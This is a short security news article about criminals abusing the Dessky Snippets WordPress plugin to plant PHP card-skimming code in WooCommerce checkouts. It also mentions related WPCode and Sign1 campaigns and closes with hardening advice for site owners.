WordPress Plugin Misused to Steal Credit Card Data

Unknown cybercriminals are exploiting lesser-known code snippet plugins for WordPress to embed malicious PHP code in websites, enabling them to steal credit card information.

On May 2024, security firm observed a campaign involving the abuse of a WordPress plugin called Dessky Snippets, which allows users to add custom PHP code. This plugin has over 200 active installations.

These attacks typically exploit previously known vulnerabilities in WordPress plugins or use easily guessable credentials to gain administrator access, allowing the attackers to install other plugins, either legitimate or malicious, for further exploitation.

The Dessky Snippets plugin is being used to insert server-side PHP credit card skimming malware on compromised sites to steal financial data.

“The malicious code was stored in the dnsp_settings option within the WordPress wp_options table and was crafted to alter the WooCommerce checkout process by modifying the billing form and injecting its own code,” explained security researcher.

Specifically, the malware adds new fields to the billing form that ask for credit card details, including names, addresses, credit card numbers, expiration dates, and CVV numbers. This sensitive information is then sent to the URL “hxxps://2of[.]cc/wp-content/.”

A notable aspect of this campaign is that the fake billing form has its autocomplete feature disabled (i.e., autocomplete=”off”).

This isn’t the first instance of threat actors using legitimate code snippet plugins for malicious activities. Last month, the misuse of the WPCode code snippet plugin to inject malicious JavaScript into WordPress sites, redirecting visitors to VexTrio domains.

Another malware campaign, named Sign1, has infected over 39,000 WordPress sites in the past six months by injecting malicious JavaScript through the Simple Custom CSS and JS plugin to redirect users to scam sites.

Owners of WordPress sites, especially those offering e-commerce services, are advised to keep their sites and plugins updated, use strong passwords to prevent brute-force attacks, and regularly check their sites for signs of malware or unauthorized changes.

To protect your e-commerce site from credit card skimming malware, ensure that all WordPress plugins and themes are regularly updated to the latest versions. Use only trusted plugins from reputable sources and remove any unnecessary plugins. Implement strong security practices, such as using complex passwords, enabling two-factor authentication, and regularly scanning your site for vulnerabilities.